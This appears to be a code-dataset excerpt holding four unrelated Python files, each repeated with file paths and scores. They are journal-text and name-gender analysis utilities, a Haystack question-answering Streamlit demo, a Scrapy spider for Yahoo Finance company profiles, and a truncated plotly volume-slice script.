from sklearn.feature_extraction.stop_words import ENGLISH_STOP_WORDS
from wordcloud import WordCloud
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.model_selection import train_test_split
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.naive_bayes import MultinomialNB
from sklearn.ensemble import RandomForestClassifier
from sklearn import metrics
from IPython.display import display
def get_date(date_text):
"""
Extract date from text in format yyyy-mm-dd 00:00:00
"""
date_text = date_text.split(':')[1][1:].split()
#print date_text[0]+' '+date_text[1][:3]+' '+date_text[2]
if len(date_text)<3:
date_text = date(1900, 7, 14)
else:
date_text = datetime.strptime(date_text[0]+' '+date_text[1][:3]+' '+date_text[2], '%d %b %Y')
return date_text
def get_pubhistory(dates):
"""
Extract publication history from list of dates in text format yyyy-mm-dd 00:00:00
"""
# create publication history
if len(dates)==0:
received = date(1900, 7, 14)
accepted = published = received
elif len(dates)==1:
received = get_date(dates[0])
accepted = published = received
elif len(dates)==2:
received = get_date(dates[0])
accepted = get_date(dates[1])
published = accepted
else:
received = get_date(dates[0])
accepted = get_date(dates[1])
published = get_date(dates[2])
return received, accepted, published
def get_month(date):
"""
Extract month from date
"""
return int(date.split('-')[1])
def get_year(date):
"""
Extract year from date
"""
return int(date.split('-')[0])
def find_categories(html):
"""
Find number of papers for each category in the html of a journal issue
"""
# read html issue page and extract categories for each paper
soup = BeautifulSoup(html, "html5lib")
infos = soup.findAll('div', { "class" : "subject" })
# remove parenthesis from categories to be able to do regex
infos_reg = [str(info).replace('(','.*?') for info in infos]
infos_reg = [info.replace(')','.*?') for info in infos_reg]
#print infos
categories=[]
for iinfo in range(len(infos)-1):
infostr = '(('+str(infos_reg[iinfo])+').*?('+str(infos_reg[iinfo+1])+'))'
#print infostr
dois = re.findall(unicode(infostr, "utf-8"), html, re.DOTALL)
#print dois[0][0]
dois = re.findall('"((/doi/abs).*?)"', dois[0][0])
#print dois
#category = re.findall(r'subject">(.*)</div>', str(infos[iinfo]))
category = re.findall(r'subject">(.*)</div>', str(infos[iinfo]))[0].decode("utf-8")
print '%s: %d' %(category, len(dois)/2)
categories.extend([category]*(len(dois)/2))
return categories
def words_from_text(texts):
"""
Loop through list of strings and extract all words and remove common stopwords
"""
words = []
# extract words and make them lower case
for text in texts:
tokens = re.findall('\w+', text)
for word in tokens:
words.append(word.lower())
# get English stopwords and remove them from list of words
sw = nltk.corpus.stopwords.words('english')
# add sklearn stopwords to words_sw
sw = set(sw + list(ENGLISH_STOP_WORDS))
# add to words_ns all words that are in words but not in sw
words_ns = []
for word in words:
if word not in sw:
words_ns.append(word)
#print words_ns
return words_ns
def extract_first_authors_name(author_list):
"""
Extract first name from a string including list of authors in form Author1; Author2; ...; AuthorN
"""
return author_list.split(';')[0].split(' ')[0]
def gender_features(word):
"""
Feature extractor for the name classifier
The feature evaluated here is the last letter of a name
feature name - "last_letter"
"""
return {"last_letter": word[-1]} # feature set
def gender_training(verb=False):
"""
Gender training based on nltk.NaiveBayesClassifier
"""
# Extract the data sets
labeled_names = ([(name, "male") for name in names.words("male.txt")] +
[(name, "female") for name in names.words("female.txt")])
# Shuffle the names in the list
random.shuffle(labeled_names)
# Process the names through feature extractor
feature_sets = [(gender_features(n), gender)
for (n, gender) in labeled_names]
# Divide the feature sets into training and test sets
train_set, test_set = feature_sets[500:], feature_sets[:500]
# Train the naiveBayes classifier
classifier = nltk.NaiveBayesClassifier.train(train_set)
if verb:
# Test the accuracy of the classifier on the test data
print('Accuracy: %f ' % nltk.classify.accuracy(classifier, test_set))
print classifier.show_most_informative_features(5)
return classifier
def gender_classifier(name, classifier):
"""
Apply gender classifier to a name
"""
return classifier.classify(gender_features(name))
def print_confusion_matrix(confusion_matrix, class_names, figsize = (10,7), fontsize=14):
"""Prints a confusion matrix, as returned by sklearn.metrics.confusion_matrix, as a heatmap.
Arguments
---------
confusion_matrix: numpy.ndarray
The numpy.ndarray object returned from a call to sklearn.metrics.confusion_matrix.
Similarly constructed ndarrays can also be used.
class_names: list
An ordered list of class names, in the order they index the given confusion matrix.
figsize: tuple
A 2-long tuple, the first value determining the horizontal size of the ouputted figure,
the second determining the vertical size. Defaults to (10,7).
fontsize: int
Font size for axes labels. Defaults to 14.
Returns
-------
matplotlib.figure.Figure
The resulting confusion matrix figure
"""
df_cm = pd.DataFrame(
confusion_matrix, index=class_names, columns=class_names,
)
fig = plt.figure(figsize=figsize)
try:
heatmap = sns.heatmap(df_cm, annot=True, fmt="d")
except ValueError:
raise ValueError("Confusion matrix values must be integers.")
heatmap.yaxis.set_ticklabels(heatmap.yaxis.get_ticklabels(), rotation=0, ha='right', fontsize=fontsize)
heatmap.xaxis.set_ticklabels(heatmap.xaxis.get_ticklabels(), rotation=45, ha='right', fontsize=fontsize)
plt.ylabel('True label')
plt.xlabel('Predicted label') | utils.py |
import os
import glob
from datetime import datetime,date
import random
import itertools
import pickle
import time
import requests
from bs4 import BeautifulSoup
import re
import nltk
from nltk.corpus import names
from nltk.tokenize import RegexpTokenizer
from sklearn.feature_extraction.stop_words import ENGLISH_STOP_WORDS
from wordcloud import WordCloud
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.model_selection import train_test_split
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.naive_bayes import MultinomialNB
from sklearn.ensemble import RandomForestClassifier
from sklearn import metrics
from IPython.display import display
def get_date(date_text):
"""
Extract date from text in format yyyy-mm-dd 00:00:00
"""
date_text = date_text.split(':')[1][1:].split()
#print date_text[0]+' '+date_text[1][:3]+' '+date_text[2]
if len(date_text)<3:
date_text = date(1900, 7, 14)
else:
date_text = datetime.strptime(date_text[0]+' '+date_text[1][:3]+' '+date_text[2], '%d %b %Y')
return date_text
def get_pubhistory(dates):
"""
Extract publication history from list of dates in text format yyyy-mm-dd 00:00:00
"""
# create publication history
if len(dates)==0:
received = date(1900, 7, 14)
accepted = published = received
elif len(dates)==1:
received = get_date(dates[0])
accepted = published = received
elif len(dates)==2:
received = get_date(dates[0])
accepted = get_date(dates[1])
published = accepted
else:
received = get_date(dates[0])
accepted = get_date(dates[1])
published = get_date(dates[2])
return received, accepted, published
def get_month(date):
"""
Extract month from date
"""
return int(date.split('-')[1])
def get_year(date):
"""
Extract year from date
"""
return int(date.split('-')[0])
def find_categories(html):
"""
Find number of papers for each category in the html of a journal issue
"""
# read html issue page and extract categories for each paper
soup = BeautifulSoup(html, "html5lib")
infos = soup.findAll('div', { "class" : "subject" })
# remove parenthesis from categories to be able to do regex
infos_reg = [str(info).replace('(','.*?') for info in infos]
infos_reg = [info.replace(')','.*?') for info in infos_reg]
#print infos
categories=[]
for iinfo in range(len(infos)-1):
infostr = '(('+str(infos_reg[iinfo])+').*?('+str(infos_reg[iinfo+1])+'))'
#print infostr
dois = re.findall(unicode(infostr, "utf-8"), html, re.DOTALL)
#print dois[0][0]
dois = re.findall('"((/doi/abs).*?)"', dois[0][0])
#print dois
#category = re.findall(r'subject">(.*)</div>', str(infos[iinfo]))
category = re.findall(r'subject">(.*)</div>', str(infos[iinfo]))[0].decode("utf-8")
print '%s: %d' %(category, len(dois)/2)
categories.extend([category]*(len(dois)/2))
return categories
def words_from_text(texts):
"""
Loop through list of strings and extract all words and remove common stopwords
"""
words = []
# extract words and make them lower case
for text in texts:
tokens = re.findall('\w+', text)
for word in tokens:
words.append(word.lower())
# get English stopwords and remove them from list of words
sw = nltk.corpus.stopwords.words('english')
# add sklearn stopwords to words_sw
sw = set(sw + list(ENGLISH_STOP_WORDS))
# add to words_ns all words that are in words but not in sw
words_ns = []
for word in words:
if word not in sw:
words_ns.append(word)
#print words_ns
return words_ns
def extract_first_authors_name(author_list):
"""
Extract first name from a string including list of authors in form Author1; Author2; ...; AuthorN
"""
return author_list.split(';')[0].split(' ')[0]
def gender_features(word):
"""
Feature extractor for the name classifier
The feature evaluated here is the last letter of a name
feature name - "last_letter"
"""
return {"last_letter": word[-1]} # feature set
def gender_training(verb=False):
"""
Gender training based on nltk.NaiveBayesClassifier
"""
# Extract the data sets
labeled_names = ([(name, "male") for name in names.words("male.txt")] +
[(name, "female") for name in names.words("female.txt")])
# Shuffle the names in the list
random.shuffle(labeled_names)
# Process the names through feature extractor
feature_sets = [(gender_features(n), gender)
for (n, gender) in labeled_names]
# Divide the feature sets into training and test sets
train_set, test_set = feature_sets[500:], feature_sets[:500]
# Train the naiveBayes classifier
classifier = nltk.NaiveBayesClassifier.train(train_set)
if verb:
# Test the accuracy of the classifier on the test data
print('Accuracy: %f ' % nltk.classify.accuracy(classifier, test_set))
print classifier.show_most_informative_features(5)
return classifier
def gender_classifier(name, classifier):
"""
Apply gender classifier to a name
"""
return classifier.classify(gender_features(name))
def print_confusion_matrix(confusion_matrix, class_names, figsize = (10,7), fontsize=14):
"""Prints a confusion matrix, as returned by sklearn.metrics.confusion_matrix, as a heatmap.
Arguments
---------
confusion_matrix: numpy.ndarray
The numpy.ndarray object returned from a call to sklearn.metrics.confusion_matrix.
Similarly constructed ndarrays can also be used.
class_names: list
An ordered list of class names, in the order they index the given confusion matrix.
figsize: tuple
A 2-long tuple, the first value determining the horizontal size of the ouputted figure,
the second determining the vertical size. Defaults to (10,7).
fontsize: int
Font size for axes labels. Defaults to 14.
Returns
-------
matplotlib.figure.Figure
The resulting confusion matrix figure
"""
df_cm = pd.DataFrame(
confusion_matrix, index=class_names, columns=class_names,
)
fig = plt.figure(figsize=figsize)
try:
heatmap = sns.heatmap(df_cm, annot=True, fmt="d")
except ValueError:
raise ValueError("Confusion matrix values must be integers.")
heatmap.yaxis.set_ticklabels(heatmap.yaxis.get_ticklabels(), rotation=0, ha='right', fontsize=fontsize)
heatmap.xaxis.set_ticklabels(heatmap.xaxis.get_ticklabels(), rotation=45, ha='right', fontsize=fontsize)
plt.ylabel('True label')
plt.xlabel('Predicted label') | 0.328099 | 0.154089 |
import os
import sys
import html
import logging
import pandas as pd
from json import JSONDecodeError
from pathlib import Path
import streamlit as st
from annotated_text import annotation
from markdown import markdown
from htbuilder import H
# streamlit does not support any states out of the box. On every button click, streamlit reload the whole page
# and every value gets lost. To keep track of our feedback state we use the official streamlit gist mentioned
# here https://gist.github.com/tvst/036da038ab3e999a64497f42de966a92
import SessionState
from utils import HS_VERSION, feedback_doc, haystack_is_ready, retrieve_doc, upload_doc, haystack_version
# Adjust to a question that you would like users to see in the search bar when they load the UI:
DEFAULT_QUESTION_AT_STARTUP = "Who's the father of <NAME>?"
# Labels for the evaluation
EVAL_LABELS = os.getenv("EVAL_FILE", Path(__file__).parent / "eval_labels_example.csv")
# Whether the file upload should be enabled or not
DISABLE_FILE_UPLOAD = os.getenv("HAYSTACK_UI_DISABLE_FILE_UPLOAD")
def main():
# Persistent state
state = SessionState.get(
random_question=DEFAULT_QUESTION_AT_STARTUP,
random_answer="",
results=None,
raw_json=None,
get_next_question=True
)
# Small callback to reset the interface in case the text of the question changes
def reset_results(*args):
state.results = None
state.raw_json = None
# Title
st.write("# Haystack Demo")
# Sidebar
st.sidebar.header("Options")
top_k_reader = st.sidebar.slider("Max. number of answers", min_value=1, max_value=10, value=3, step=1)
top_k_retriever = st.sidebar.slider("Max. number of documents from retriever", min_value=1, max_value=10, value=3, step=1)
eval_mode = st.sidebar.checkbox("Evaluation mode")
debug = st.sidebar.checkbox("Show debug info")
# File upload block
if not DISABLE_FILE_UPLOAD:
st.sidebar.write("## File Upload:")
data_files = st.sidebar.file_uploader("", type=["pdf", "txt", "docx"], accept_multiple_files=True)
for data_file in data_files:
# Upload file
if data_file:
raw_json = upload_doc(data_file)
st.sidebar.write(str(data_file.name) + " ✅ ")
if debug:
st.subheader("REST API JSON response")
st.sidebar.write(raw_json)
hs_version = None
try:
hs_version = f" <small>(v{haystack_version()})</small>"
except Exception:
pass
st.sidebar.markdown(f"""
<style>
a {{
text-decoration: none;
}}
.haystack-footer {{
text-align: center;
}}
.haystack-footer h4 {{
margin: 0.1rem;
padding:0;
}}
footer {{
opacity: 0;
}}
</style>
<div class="haystack-footer">
<hr />
<h4>Built with <a href="https://www.deepset.ai/haystack">Haystack</a>{hs_version}</h4>
<p>Get it on <a href="https://github.com/deepset-ai/haystack/">GitHub</a> - Read the <a href="https://haystack.deepset.ai/overview/intro">Docs</a></p>
<small>Data crawled from <a href="https://en.wikipedia.org/wiki/Category:Lists_of_countries_by_continent">Wikipedia</a> in November 2021.<br />See the <a href="https://creativecommons.org/licenses/by-sa/3.0/">License</a> (CC BY-SA 3.0).</small>
</div>
""", unsafe_allow_html=True)
# Load csv into pandas dataframe
if eval_mode:
try:
df = pd.read_csv(EVAL_LABELS, sep=";")
except Exception:
st.error(f"The eval file was not found. Please check the demo's [README](https://github.com/deepset-ai/haystack/tree/master/ui/README.md) for more information.")
sys.exit(f"The eval file was not found under `{EVAL_LABELS}`. Please check the README (https://github.com/deepset-ai/haystack/tree/master/ui/README.md) for more information.")
# Get next random question from the CSV
state.get_next_question = st.button("Load new question")
if state.get_next_question:
reset_results()
new_row = df.sample(1)
while new_row["Question Text"].values[0] == state.random_question: # Avoid picking the same question twice (the change is not visible on the UI)
new_row = df.sample(1)
state.random_question = new_row["Question Text"].values[0]
state.random_answer = new_row["Answer"].values[0]
# Search bar
question = st.text_input(
"Please provide your query:",
value=state.random_question,
max_chars=100,
on_change=reset_results
)
run_query = st.button("Run")
# Check the connection
with st.spinner("⌛️ Haystack is starting..."):
if not haystack_is_ready():
st.error("🚫 Connection Error. Is Haystack running?")
run_query = False
reset_results()
# Get results for query
if run_query and question:
reset_results()
with st.spinner(
"🧠 Performing neural search on documents... \n "
"Do you want to optimize speed or accuracy? \n"
"Check out the docs: https://haystack.deepset.ai/usage/optimization "
):
try:
state.results, state.raw_json = retrieve_doc(question, top_k_reader=top_k_reader, top_k_retriever=top_k_retriever)
except JSONDecodeError as je:
st.error("👓 An error occurred reading the results. Is the document store working?")
return
except Exception as e:
logging.exception(e)
if "The server is busy processing requests" in str(e):
st.error("🧑🌾 All our workers are busy! Try again later.")
else:
st.error("🐞 An error occurred during the request. Check the logs in the console to know more.")
return
if state.results:
# Show the gold answer if we use a question of the given set
if question == state.random_question and eval_mode:
st.write("## Correct answers:")
st.write(state.random_answer)
st.write("## Results:")
count = 0 # Make every button key unique
for result in state.results:
if result["answer"]:
answer, context = result["answer"], result["context"]
start_idx = context.find(answer)
end_idx = start_idx + len(answer)
# Hack due to this bug: https://github.com/streamlit/streamlit/issues/3190
st.write(markdown(context[:start_idx] + str(annotation(answer, "ANSWER", "#8ef")) + context[end_idx:]), unsafe_allow_html=True)
st.write("**Relevance:** ", result["relevance"], "**Source:** ", result["source"])
else:
st.warning("🤔 Haystack found no good answer to your question. Try to formulate it differently!")
st.write("**Relevance:** ", result["relevance"])
if eval_mode:
# Define columns for buttons
button_col1, button_col2, button_col3, _ = st.columns([1, 1, 1, 6])
if button_col1.button("👍", key=f"{result['context']}{count}1", help="Correct answer"):
feedback_doc(
question=question,
is_correct_answer="true",
document_id=result.get("document_id", None),
model_id=1,
is_correct_document="true",
answer=result["answer"],
offset_start_in_doc=result.get("offset_start_in_doc", None)
)
st.success("✨ Thanks for your feedback! ✨")
if button_col2.button("👎", key=f"{result['context']}{count}2", help="Wrong answer and wrong passage"):
feedback_doc(
question=question,
is_correct_answer="false",
document_id=result.get("document_id", None),
model_id=1,
is_correct_document="false",
answer=result["answer"],
offset_start_in_doc=result.get("offset_start_in_doc", None)
)
st.success("✨ Thanks for your feedback! ✨")
if button_col3.button("👎👍", key=f"{result['context']}{count}3", help="Wrong answer, but correct passage"):
feedback_doc(
question=question,
is_correct_answer="false",
document_id=result.get("document_id", None),
model_id=1,
is_correct_document="true",
answer=result["answer"],
offset_start_in_doc=result.get("offset_start_in_doc", None)
)
st.success("✨ Thanks for your feedback! ✨")
count += 1
st.write("___")
if debug:
st.subheader("REST API JSON response")
st.write(state.raw_json)
main() | ui/webapp.py | import os
import sys
import html
import logging
import pandas as pd
from json import JSONDecodeError
from pathlib import Path
import streamlit as st
from annotated_text import annotation
from markdown import markdown
from htbuilder import H
# streamlit does not support any states out of the box. On every button click, streamlit reload the whole page
# and every value gets lost. To keep track of our feedback state we use the official streamlit gist mentioned
# here https://gist.github.com/tvst/036da038ab3e999a64497f42de966a92
import SessionState
from utils import HS_VERSION, feedback_doc, haystack_is_ready, retrieve_doc, upload_doc, haystack_version
# Adjust to a question that you would like users to see in the search bar when they load the UI:
DEFAULT_QUESTION_AT_STARTUP = "Who's the father of <NAME>?"
# Labels for the evaluation
EVAL_LABELS = os.getenv("EVAL_FILE", Path(__file__).parent / "eval_labels_example.csv")
# Whether the file upload should be enabled or not
DISABLE_FILE_UPLOAD = os.getenv("HAYSTACK_UI_DISABLE_FILE_UPLOAD")
def main():
# Persistent state
state = SessionState.get(
random_question=DEFAULT_QUESTION_AT_STARTUP,
random_answer="",
results=None,
raw_json=None,
get_next_question=True
)
# Small callback to reset the interface in case the text of the question changes
def reset_results(*args):
state.results = None
state.raw_json = None
# Title
st.write("# Haystack Demo")
# Sidebar
st.sidebar.header("Options")
top_k_reader = st.sidebar.slider("Max. number of answers", min_value=1, max_value=10, value=3, step=1)
top_k_retriever = st.sidebar.slider("Max. number of documents from retriever", min_value=1, max_value=10, value=3, step=1)
eval_mode = st.sidebar.checkbox("Evaluation mode")
debug = st.sidebar.checkbox("Show debug info")
# File upload block
if not DISABLE_FILE_UPLOAD:
st.sidebar.write("## File Upload:")
data_files = st.sidebar.file_uploader("", type=["pdf", "txt", "docx"], accept_multiple_files=True)
for data_file in data_files:
# Upload file
if data_file:
raw_json = upload_doc(data_file)
st.sidebar.write(str(data_file.name) + " ✅ ")
if debug:
st.subheader("REST API JSON response")
st.sidebar.write(raw_json)
hs_version = None
try:
hs_version = f" <small>(v{haystack_version()})</small>"
except Exception:
pass
st.sidebar.markdown(f"""
<style>
a {{
text-decoration: none;
}}
.haystack-footer {{
text-align: center;
}}
.haystack-footer h4 {{
margin: 0.1rem;
padding:0;
}}
footer {{
opacity: 0;
}}
</style>
<div class="haystack-footer">
<hr />
<h4>Built with <a href="https://www.deepset.ai/haystack">Haystack</a>{hs_version}</h4>
<p>Get it on <a href="https://github.com/deepset-ai/haystack/">GitHub</a> - Read the <a href="https://haystack.deepset.ai/overview/intro">Docs</a></p>
<small>Data crawled from <a href="https://en.wikipedia.org/wiki/Category:Lists_of_countries_by_continent">Wikipedia</a> in November 2021.<br />See the <a href="https://creativecommons.org/licenses/by-sa/3.0/">License</a> (CC BY-SA 3.0).</small>
</div>
""", unsafe_allow_html=True)
# Load csv into pandas dataframe
if eval_mode:
try:
df = pd.read_csv(EVAL_LABELS, sep=";")
except Exception:
st.error(f"The eval file was not found. Please check the demo's [README](https://github.com/deepset-ai/haystack/tree/master/ui/README.md) for more information.")
sys.exit(f"The eval file was not found under `{EVAL_LABELS}`. Please check the README (https://github.com/deepset-ai/haystack/tree/master/ui/README.md) for more information.")
# Get next random question from the CSV
state.get_next_question = st.button("Load new question")
if state.get_next_question:
reset_results()
new_row = df.sample(1)
while new_row["Question Text"].values[0] == state.random_question: # Avoid picking the same question twice (the change is not visible on the UI)
new_row = df.sample(1)
state.random_question = new_row["Question Text"].values[0]
state.random_answer = new_row["Answer"].values[0]
# Search bar
question = st.text_input(
"Please provide your query:",
value=state.random_question,
max_chars=100,
on_change=reset_results
)
run_query = st.button("Run")
# Check the connection
with st.spinner("⌛️ Haystack is starting..."):
if not haystack_is_ready():
st.error("🚫 Connection Error. Is Haystack running?")
run_query = False
reset_results()
# Get results for query
if run_query and question:
reset_results()
with st.spinner(
"🧠 Performing neural search on documents... \n "
"Do you want to optimize speed or accuracy? \n"
"Check out the docs: https://haystack.deepset.ai/usage/optimization "
):
try:
state.results, state.raw_json = retrieve_doc(question, top_k_reader=top_k_reader, top_k_retriever=top_k_retriever)
except JSONDecodeError as je:
st.error("👓 An error occurred reading the results. Is the document store working?")
return
except Exception as e:
logging.exception(e)
if "The server is busy processing requests" in str(e):
st.error("🧑🌾 All our workers are busy! Try again later.")
else:
st.error("🐞 An error occurred during the request. Check the logs in the console to know more.")
return
if state.results:
# Show the gold answer if we use a question of the given set
if question == state.random_question and eval_mode:
st.write("## Correct answers:")
st.write(state.random_answer)
st.write("## Results:")
count = 0 # Make every button key unique
for result in state.results:
if result["answer"]:
answer, context = result["answer"], result["context"]
start_idx = context.find(answer)
end_idx = start_idx + len(answer)
# Hack due to this bug: https://github.com/streamlit/streamlit/issues/3190
st.write(markdown(context[:start_idx] + str(annotation(answer, "ANSWER", "#8ef")) + context[end_idx:]), unsafe_allow_html=True)
st.write("**Relevance:** ", result["relevance"], "**Source:** ", result["source"])
else:
st.warning("🤔 Haystack found no good answer to your question. Try to formulate it differently!")
st.write("**Relevance:** ", result["relevance"])
if eval_mode:
# Define columns for buttons
button_col1, button_col2, button_col3, _ = st.columns([1, 1, 1, 6])
if button_col1.button("👍", key=f"{result['context']}{count}1", help="Correct answer"):
feedback_doc(
question=question,
is_correct_answer="true",
document_id=result.get("document_id", None),
model_id=1,
is_correct_document="true",
answer=result["answer"],
offset_start_in_doc=result.get("offset_start_in_doc", None)
)
st.success("✨ Thanks for your feedback! ✨")
if button_col2.button("👎", key=f"{result['context']}{count}2", help="Wrong answer and wrong passage"):
feedback_doc(
question=question,
is_correct_answer="false",
document_id=result.get("document_id", None),
model_id=1,
is_correct_document="false",
answer=result["answer"],
offset_start_in_doc=result.get("offset_start_in_doc", None)
)
st.success("✨ Thanks for your feedback! ✨")
if button_col3.button("👎👍", key=f"{result['context']}{count}3", help="Wrong answer, but correct passage"):
feedback_doc(
question=question,
is_correct_answer="false",
document_id=result.get("document_id", None),
model_id=1,
is_correct_document="true",
answer=result["answer"],
offset_start_in_doc=result.get("offset_start_in_doc", None)
)
st.success("✨ Thanks for your feedback! ✨")
count += 1
st.write("___")
if debug:
st.subheader("REST API JSON response")
st.write(state.raw_json)
main() | 0.396419 | 0.194731 |
from asyncio.log import logger
from ticker_scraper.items import CompanyItem
# Python
import json
import logging
# Scrapy
import scrapy
# --------------------------------------------------------------------------------------------------------------
class InfoSpider(scrapy.Spider):
'''
Spider in charge to extract the info of each company using the ticker symbol, extrating from
yahoo finance
'''
# Constants
COMPANY_NAME_XPATH = ''
BASE_URL = 'https://finance.yahoo.com/quote/{}/profile?p={}'
# Variables
name = 'info_spider'
custom_settings = {
'FEED_URI': 'company.json',
'FEED_FORMAT': 'json',
'FEED_ENCDING_FORMAT': 'urf-8',
'USER_AGENT': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36'
}
def start_requests(self):
"""Method in charge to send to the parse method each url
Yields:
[Request]: send each request to scrapy engine
"""
# Gettings tickers
tickers = self.__get_tickers() # Hasta aquí OK
#self.log(print(tickers), logging.WARNNG)
# Cathces all the links creates in the method to start request
urls_tuple = self.__get_urls(tickers) #Hasta aquí OK
#self.log(print(urls_tuple), logging.WARNNG)
# sends to the scrapy engine each url to request them and send the response to the
# parse method
self.log(print(len(urls_tuple)), logging.WARNING)
for i in range(5):
#self.log(print(urls_tuple[i]), logging.WARNING)
yield scrapy.Request(urls_tuple[i], cb_kwargs={'ticker': tickers[i]})
def parse(self, response, **kwargs):
# Creating an CompanyItem from items.py
item = CompanyItem()
# Extracting info with xpath
item['name'] = response.xpath('//div[@data-test="qsp-profile"]/h3[@class="Fz(m) Mb(10px)"]/text()').get()
item['ticker'] = kwargs['ticker']
item['sector'] = response.xpath('//*[@id="Col1-0-Profile-Proxy"]/section/div[1]/div/div/p[2]/span[2]/text()').get()
item['industry'] = response.xpath('//*[@id="Col1-0-Profile-Proxy"]/section/div[1]/div/div/p[2]/span[4]/text()').get()
item['web_page'] = response.xpath('//*[@id="Col1-0-Profile-Proxy"]/section/div[1]/div/div/p[1]/a[2]/@href').get()
item['company_resume'] = response.xpath('//*[@id="Col1-0-Profile-Proxy"]/section/section[2]/p/text()').get()
yield item
def __get_tickers(self) -> tuple:
'''
Method that extracts the tickers from the final_ticker__symbols.json
Returns:
(tuple): a tuple of the tickers
'''
try:
with open("final_ticker_symbols.json", 'r+', encoding='utf-8') as file:
# Using loads because the "file" is a Json File
tickers = json.load(file)
# The data is a list, so we pass it to a tuple because it wont be modified just read
tickers = tuple(tickers)
return tickers
except OSError:
self.log(print("file not found"), logging.WARNING)
print('file not found')
def __get_urls(self, tickers:tuple) -> tuple:
'''
Method in charge to create urls using the BASE_URL and each ticker from the tickers list
Arguments:
(tuple): a tuple of the tickers
Returns:
(tuple) : A list of urls of each ticker symbol
'''
urls_list = []
for ticker in tickers:
url = self.BASE_URL.format(ticker, ticker)
urls_list.append(url)
return tuple(urls_list) | ticker_scraper/ticker_scraper/spiders/info.py | from asyncio.log import logger
from ticker_scraper.items import CompanyItem
# Python
import json
import logging
# Scrapy
import scrapy
# --------------------------------------------------------------------------------------------------------------
class InfoSpider(scrapy.Spider):
'''
Spider in charge to extract the info of each company using the ticker symbol, extrating from
yahoo finance
'''
# Constants
COMPANY_NAME_XPATH = ''
BASE_URL = 'https://finance.yahoo.com/quote/{}/profile?p={}'
# Variables
name = 'info_spider'
custom_settings = {
'FEED_URI': 'company.json',
'FEED_FORMAT': 'json',
'FEED_ENCDING_FORMAT': 'urf-8',
'USER_AGENT': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36'
}
def start_requests(self):
"""Method in charge to send to the parse method each url
Yields:
[Request]: send each request to scrapy engine
"""
# Gettings tickers
tickers = self.__get_tickers() # Hasta aquí OK
#self.log(print(tickers), logging.WARNNG)
# Cathces all the links creates in the method to start request
urls_tuple = self.__get_urls(tickers) #Hasta aquí OK
#self.log(print(urls_tuple), logging.WARNNG)
# sends to the scrapy engine each url to request them and send the response to the
# parse method
self.log(print(len(urls_tuple)), logging.WARNING)
for i in range(5):
#self.log(print(urls_tuple[i]), logging.WARNING)
yield scrapy.Request(urls_tuple[i], cb_kwargs={'ticker': tickers[i]})
def parse(self, response, **kwargs):
# Creating an CompanyItem from items.py
item = CompanyItem()
# Extracting info with xpath
item['name'] = response.xpath('//div[@data-test="qsp-profile"]/h3[@class="Fz(m) Mb(10px)"]/text()').get()
item['ticker'] = kwargs['ticker']
item['sector'] = response.xpath('//*[@id="Col1-0-Profile-Proxy"]/section/div[1]/div/div/p[2]/span[2]/text()').get()
item['industry'] = response.xpath('//*[@id="Col1-0-Profile-Proxy"]/section/div[1]/div/div/p[2]/span[4]/text()').get()
item['web_page'] = response.xpath('//*[@id="Col1-0-Profile-Proxy"]/section/div[1]/div/div/p[1]/a[2]/@href').get()
item['company_resume'] = response.xpath('//*[@id="Col1-0-Profile-Proxy"]/section/section[2]/p/text()').get()
yield item
def __get_tickers(self) -> tuple:
'''
Method that extracts the tickers from the final_ticker__symbols.json
Returns:
(tuple): a tuple of the tickers
'''
try:
with open("final_ticker_symbols.json", 'r+', encoding='utf-8') as file:
# Using loads because the "file" is a Json File
tickers = json.load(file)
# The data is a list, so we pass it to a tuple because it wont be modified just read
tickers = tuple(tickers)
return tickers
except OSError:
self.log(print("file not found"), logging.WARNING)
print('file not found')
def __get_urls(self, tickers:tuple) -> tuple:
'''
Method in charge to create urls using the BASE_URL and each ticker from the tickers list
Arguments:
(tuple): a tuple of the tickers
Returns:
(tuple) : A list of urls of each ticker symbol
'''
urls_list = []
for ticker in tickers:
url = self.BASE_URL.format(ticker, ticker)
urls_list.append(url)
return tuple(urls_list) | 0.350866 | 0.202542 |
import plotly
import plotly.graph_objs as pgo
import numpy as np
pl_BrBG = [
[0.0, "rgb(84, 48, 5)"],
[0.1, "rgb(138, 80, 9)"],
[0.2, "rgb(191, 129, 45)"],
[0.3, "rgb(222, 192, 123)"],
[0.4, "rgb(246, 232, 195)"],
[0.5, "rgb(244, 244, 244)"],
[0.6, "rgb(199, 234, 229)"],
[0.7, "rgb(126, 203, 192)"],
[0.8, "rgb(53, 151, 143)"],
[0.9, "rgb(0, 101, 93)"],
[1.0, "rgb(0, 60, 48)"],
]
def get_the_slice(x, y, z, surfacecolor, colorscale=pl_BrBG, showscale=False):
"""https://plot.ly/python/reference/#surface"""
return pgo.Surface(
x=x, y=y, z=z, surfacecolor=surfacecolor, colorscale=colorscale, showscale=showscale
)
def get_lims_colors(surfacecolor): # color limits for a slice
return np.min(surfacecolor), np.max(surfacecolor)
def main():
alpha = np.pi / 5
x = np.linspace(-2, 2, 50)
y = np.linspace(-2, 2, 50)
x, y = np.meshgrid(x, y)
z = -x * np.tan(alpha)
def volume(x, y, z):
return x * np.exp(-x ** 2 - y ** 2 - z ** 2)
x = np.linspace(-2, 2, 50)
y = np.linspace(-2, 2, 50)
x, y = np.meshgrid(x, y)
z = np.zeros(x.shape)
surfcolor_z = volume(x, y, z)
sminz, smaxz = get_lims_colors(surfcolor_z)
slice_z = get_the_slice(x, y, z, surfcolor_z)
x = np.linspace(-2, 2, 50)
z = np.linspace(-2, 2, 50)
x, z = np.meshgrid(x, y)
y = -0.5 * np.ones(x.shape)
surfcolor_y = volume(x, y, z)
sminy, smaxy = get_lims_colors(surfcolor_y)
vmin = min([sminz, sminy])
vmax = max([smaxz, smaxy])
# slice_y = get_the_slice(x, y, z, surfcolor_y)
axis = dict(
showbackground=True,
backgroundcolor="rgb(230, 230,230)",
gridcolor="rgb(255, 255, 255)",
zerolinecolor="rgb(255, 255, 255)",
)
layout = dict(
title="Slices in volumetric data",
width=700,
height=700,
scene=dict(
xaxis=pgo.layout.scene.XAxis(axis),
yaxis=pgo.layout.scene.YAxis(axis),
